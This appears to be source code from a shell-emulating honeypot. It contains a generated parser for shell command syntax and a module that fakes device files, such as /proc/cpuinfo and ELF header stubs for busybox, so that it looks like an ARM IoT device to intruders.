def _read_cmdredir(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdredir'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_cmdargs()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
index3, elements2 = self._offset, []
address4 = FAILURE
address4 = self._read_sep()
if address4 is not FAILURE:
elements2.append(address4)
address5 = FAILURE
index4 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 3]
if chunk0 == '>>-':
address5 = TreeNode(self._input[self._offset:self._offset + 3], self._offset)
self._offset = self._offset + 3
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('">>-"')
if address5 is FAILURE:
self._offset = index4
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 2]
if chunk1 == '>>':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('">>"')
if address5 is FAILURE:
self._offset = index4
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 2]
if chunk2 == '<<':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"<<"')
if address5 is FAILURE:
self._offset = index4
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 2]
if chunk3 == '<>':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"<>"')
if address5 is FAILURE:
self._offset = index4
chunk4 = None
if self._offset < self._input_size:
chunk4 = self._input[self._offset:self._offset + 2]
if chunk4 == '<&':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"<&"')
if address5 is FAILURE:
self._offset = index4
chunk5 = None
if self._offset < self._input_size:
chunk5 = self._input[self._offset:self._offset + 2]
if chunk5 == '>&':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('">&"')
if address5 is FAILURE:
self._offset = index4
chunk6 = None
if self._offset < self._input_size:
chunk6 = self._input[self._offset:self._offset + 1]
if chunk6 == '<':
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"<"')
if address5 is FAILURE:
self._offset = index4
chunk7 = None
if self._offset < self._input_size:
chunk7 = self._input[self._offset:self._offset + 1]
if chunk7 == '>':
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('">"')
if address5 is FAILURE:
self._offset = index4
if address5 is not FAILURE:
elements2.append(address5)
address6 = FAILURE
address6 = self._read_sep()
if address6 is not FAILURE:
elements2.append(address6)
address7 = FAILURE
address7 = self._read_arg()
if address7 is not FAILURE:
elements2.append(address7)
else:
elements2 = None
self._offset = index3
else:
elements2 = None
self._offset = index3
else:
elements2 = None
self._offset = index3
else:
elements2 = None
self._offset = index3
if elements2 is None:
address3 = FAILURE
else:
address3 = TreeNode8(self._input[index3:self._offset], index3, elements2)
self._offset = self._offset
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_redir(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['cmdredir'][index0] = (address0, self._offset)
return address0
def _read_cmdargs(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdargs'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_cmdbrac()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_args()
if address0 is FAILURE:
self._offset = index1
self._cache['cmdargs'][index0] = (address0, self._offset)
return address0
def _read_cmdbrac(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdbrac'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '(':
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"("')
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_sep()
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_cmd()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_sep()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 == ')':
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('")"')
if address5 is not FAILURE:
elements0.append(address5)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_cmdbrac(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['cmdbrac'][index0] = (address0, self._offset)
return address0
def _read_args(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['args'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_arg()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
index3, elements2 = self._offset, []
address4 = FAILURE
remaining1, index4, elements3, address5 = 1, self._offset, [], True
while address5 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == ' ':
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('" "')
if address5 is not FAILURE:
elements3.append(address5)
remaining1 -= 1
if remaining1 <= 0:
address4 = TreeNode(self._input[index4:self._offset], index4, elements3)
self._offset = self._offset
else:
address4 = FAILURE
if address4 is not FAILURE:
elements2.append(address4)
address6 = FAILURE
address6 = self._read_arg()
if address6 is not FAILURE:
elements2.append(address6)
else:
elements2 = None
self._offset = index3
else:
elements2 = None
self._offset = index3
if elements2 is None:
address3 = FAILURE
else:
address3 = TreeNode11(self._input[index3:self._offset], index3, elements2)
self._offset = self._offset
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_args(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['args'][index0] = (address0, self._offset)
return address0
def _read_arg(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['arg'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_arg_quot1()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_arg_quot2()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_arg_noquot()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_empty()
if address0 is FAILURE:
self._offset = index1
self._cache['arg'][index0] = (address0, self._offset)
return address0
def _read_arg_noempty(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['arg_noempty'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_arg_quot1()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_arg_quot2()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_arg_noquot()
if address0 is FAILURE:
self._offset = index1
self._cache['arg_noempty'][index0] = (address0, self._offset)
return address0
def _read_arg_quot1(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['arg_quot1'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '\'':
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"\'"')
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 is not None and Grammar.REGEX_1.search(chunk1):
address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address3 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^\']')
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
address4 = FAILURE
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 1]
if chunk2 == '\'':
address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"\'"')
if address4 is not FAILURE:
elements0.append(address4)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['arg_quot1'][index0] = (address0, self._offset)
return address0
def _read_arg_quot2(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['arg_quot2'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '"':
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'"\'')
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 is not None and Grammar.REGEX_2.search(chunk1):
address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address3 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^"]')
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
address4 = FAILURE
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 1]
if chunk2 == '"':
address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'"\'')
if address4 is not FAILURE:
elements0.append(address4)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['arg_quot2'][index0] = (address0, self._offset)
return address0
def _read_arg_noquot(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['arg_noquot'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_3.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^ ;|&()"\'><]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = self._actions.make_arg_noquot(self._input, index1, self._offset, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['arg_noquot'][index0] = (address0, self._offset)
return address0
def _read_empty(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['empty'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 0]
if chunk0 == '':
address0 = TreeNode(self._input[self._offset:self._offset + 0], self._offset)
self._offset = self._offset + 0
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('""')
if address0 is FAILURE:
address0 = TreeNode(self._input[index1:index1], index1)
self._offset = index1
self._cache['empty'][index0] = (address0, self._offset)
return address0
def _read_sep(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['sep'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 0, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == ' ':
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('" "')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['sep'][index0] = (address0, self._offset)
return address0
class Parser(Grammar):
def __init__(self, input, actions, types):
self._input = input
self._input_size = len(input)
self._actions = actions
self._types = types
self._offset = 0
self._cache = defaultdict(dict)
self._failure = 0
self._expected = []
def parse(self):
tree = self._read_cmd()
if tree is not FAILURE and self._offset == self._input_size:
return tree
if not self._expected:
self._failure = self._offset
self._expected.append('<EOF>')
raise ParseError(format_error(self._input, self._failure, self._expected))
def format_error(input, offset, expected):
lines, line_no, position = input.split('\n'), 0, 0
while position <= offset:
position += len(lines[line_no]) + 1
line_no += 1
message, line = 'Line ' + str(line_no) + ': expected ' + ', '.join(expected) + '\n', lines[line_no - 1]
message += line + '\n'
position -= len(line) + 1
message += ' ' * (offset - position)
return message + '^'
def parse(input, actions=None, types=None):
parser = Parser(input, actions, types)
return parser.parse()
================================================
FILE: honeypot/shell/shell.py
================================================
import sys
import traceback
from grammar import parse, TreeNode
from commands.base import Proc
def filter_ascii(string):
string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in " ")
return string
###
ELF_BIN_ARM = "\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00(\x00\x01\x00\x00\x00h\xc2\x00\x004\x00\x00\x00X^\x01\x00\x02\x00\x00\x054\x00 \x00\x08\x00(\x00\x1c\x00\x1b\x00\x01\x00\x00p\xc0X\x01\x00\xc0\xd8\x01\x00\xc0\xd8\x01\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x004\x00\x00\x004\x80\x00\x004\x80\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x004\x01\x00\x004\x81\x00\x004\x81\x00\x00\x13\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\xdcX\x01\x00\xdcX\x01\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00\xdcX\x01\x00\xdcX\x02\x00\xdcX\x02\x00\x1c\x04\x00\x00\xbc\x10\x00\x00\x06\x00\x00\x00\x00\x80\x00\x00\x02\x00\x00\x00\xe8X\x01\x00\xe8X\x02\x00\xe8X\x02\x00\x08\x01\x00\x00\x08\x01\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00H\x01\x00\x00H\x81\x00\x00H\x81\x00\x00D\x00\x00\x00D\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00Q\xe5td\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00/lib/ld-linux.so.3\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00GNU\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x1b\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00\x02Tz0\x80\x94\xc2\x8e%\xf1\xa4\xad\xc7D\xa9\x91q\x94\xdb\na\x00\x00\x00\x06\x00\x00\x00 \x00\x00\x00\n\x00\x00\x00\x00I\x10\x92\x02D\x1b&@\x10@\xe0B\x00`\x00\x91AA\x10\x00r\x11\x11aH\x14(\x00\x00\x00\x00\x08\x00\x00\x80\x90\t\x00 \x08\x00*\x00@\x00$\xad\x11\x10\x81,(\x00\x00\t@J!\x91\x19\xadA\x04\x80IE\x85\x85\xf0\x88\xb3h\x80\x02H\x08\x80\x80\x00\x08\x01(d\x0e!M\xe0\xa8D\x94\x02 \x00\x08\x01\x87)\x00\x08\n\x00J\x08\x0e\x01\xc0-\x00 @\x18\x80d\xe6 \x81\x02\x00\x89\n\x90\x00$\x0e\x8c\xb0(\x06\x00\x00\x00\x08\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x12\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00\x19\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00%\x00\x00\x00\x00\x00\x00\x00'\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00*\x00\x00\x00,\x00\x00\x000\x00\x00\x002\x00\x00\x00\x00\x00\x00\x003\x00\x00\x00\x00\x00\x00\x006\x00\x00\x008\x00\x00\x00:\x00\x00\x00<\x00\x00\x00>\x00\x00\x00?\x00\x00\x00A\x00\x00\x00G\x00\x00\x00I\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00L\x00\x00\x00\x00\x00\x00\x00N\x00\x00\x00R\x00\x00\x00S\x00\x00\x00T\x00\x00\x00U\x00\x00\x00\x00\x00\x00\x00V\x00\x00\x00W\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00Y\x00\x00\x00Z\x00\x00\x00\\\x00\x00\x00^\x00\x00\x00`\x00\x00\x00c\x00\x00\x00d\x00\x00\x00f\x00\x00\x00h\x00\x00\x00i\x00\x00\x00k\x00\x00\x00n\x00\x00\x00q\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\x00\x00\x00\x00\x00\x00\x00u\x00\x00\x00v\x00\x00\x00y\x00\x00\x00z\x00\x00\x00\x00\x00\x00\x00{\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00~\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00\x81\x00\x00\x00\x82\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x84\x00\x00\x00\x08,\xae\xff_\x96\x93\x1c\x03}\x1eL\xa3Z\xef\x90V\xdb\x93\x1c\xa8vbICw)\x91,2@\xfd\xda\x80A\xb7\xed\xe9C+\xf1\x81B\x84\xcf\x18L\x0fvT<\x94\xca\x96\x93\x1c\xcd?\x0c\xaf\x88j\x06\xaf\x8dm\x94\x06\x08~\x92\x1c!t\xb0\x02\xe2\xad\xc6\x1b.N=\xf6\xdb\xf7\x00^\x01\xaf4\xe8_t;\xc5"
ELF_BIN_X86 = "\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00>\x00\x01\x00\x00\x00P\x1c\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xb8\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\t\x00@\x00\x1c\x00\x1b\x00\x06\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x008\x02\x00\x00\x00\x00\x00\x008\x02\x00\x00\x00\x00\x00\x008\x02\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98m\x00\x00\x00\x00\x00\x00\x98m\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xf0{\x00\x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\x90\x04\x00\x00\x00\x00\x00\x000\x06\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00X|\x00\x00\x00\x00\x00\x00X| \x00\x00\x00\x00\x00X| \x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00D\x00\x00\x00\x00\x00\x00\x00D\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00P\xe5td\x04\x00\x00\x00d`\x00\x00\x00\x00\x00\x00d`\x00\x00\x00\x00\x00\x00d`\x00\x00\x00\x00\x00\x00D\x02\x00\x00\x00\x00\x00\x00D\x02\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00Q\xe5td\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00R\xe5td\x04\x00\x00\x00\xf0{\x00\x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\x10\x04\x00\x00\x00\x00\x00\x00\x10\x04\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00/lib64/ld-linux-x86-64.so.2\x00\x04\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00GNU\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00Y\xde\xf0\x1bLK<H}\x8b\xb8\x98mI\xbeo\xf4b8w\x03\x00\x00\x005\x00\x00\x00\x02\x00\x00\x00\x07\x00\x00\x00\x12\x01\xd2$\x12)\x00V`A\x00\x0e \x00\x00\x005\x00\x00\x009\x00\x00\x00@\x00\x00\x00\x04\x8b&\xa4(\x1d\x8c\x1c\x10\x8aM#\xc9MB#\xbcPv\x9e\xacK\xe3\xc0\x96\xa0\x89\x97F-\xe4\xde\xce,cr\xe4bA\xf59\xf2\x8b\x1c*\xd4\xb8\xd3\x1c\xedc*?\x04K\x86\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x01\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00<\x01\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x01\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00s\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd9\x02\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00y\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\x01\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
globalfiles = {
"/proc/mounts": """/dev/root /rom squashfs ro,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,noatime 0 0
sysfs /sys sysfs rw,nosuid,nodev,noexec,noatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noatime 0 0
/dev/mtdblock10 /overlay jffs2 rw,noatime 0 0
overlayfs:/overlay / overlay rw,noatime,lowerdir=/,upperdir=/overlay/upper,workdir=/overlay/work 0 0
tmpfs /dev tmpfs rw,nosuid,relatime,size=512k,mode=755 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,mode=600 0 0
debugfs /sys/kernel/debug debugfs rw,noatime 0 0\n""",
"/proc/cpuinfo": """processor : 0
model name : ARMv6-compatible processor rev 7 (v6l)
BogoMIPS : 697.95
Features : half thumb fastmult vfp edsp java tls
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x0
CPU part : 0xb76
CPU revision : 7
Hardware : BCM2835
Revision : 000e
Serial : 0000000000000000\n""",
"/bin/echo": ELF_BIN_ARM,
"/bin/busybox": ELF_BIN_ARM
}
def instantwrite(msg):
sys.stdout.write(msg)
sys.stdout.flush()
class Env:
def __init__(self, output=instantwrite):
self.files = {}
self.deleted = []
self.events = {}
self.output = output
def write(self, string):
self.output(string)
def deleteFile(self, path):
if path in self.files:
self.deleted.append((path, self.files[path]))
del self.files[path]
def writeFile(self, path, string):
if path in self.files:
self.files[path] += string
else:
self.files[path] = string
def readFile(self, path):
if path in self.files:
return self.files[path]
elif path in globalfiles:
return globalfiles[path]
else:
return None
def listen(self, event, handler):
self.events[event] = handler
def action(self, event, data):
if event in self.events:
self.events[event](data)
else:
print("WARNING: Event '" + event + "' not registered")
def listfiles(self):
return self.files
class RedirEnv:
def __init__(self, baseenv, redir):
self.baseenv = baseenv
self.redir = redir
def write(self, string):
self.baseenv.writeFile(self.redir, string)
def deleteFile(self, path):
self.baseenv.deleteFile(path)
def writeFile(self, path, string):
self.baseenv.writeFile(path, string)
def readFile(self, path):
return self.baseenv.readFile(path)
def listen(self, event, handler):
self.baseenv.listen(event, handler)
def action(self, event, data):
self.baseenv.action(event, data)
def listfiles(self):
return self.baseenv.listfiles()
class Command:
def __init__(self, args):
self.args = args
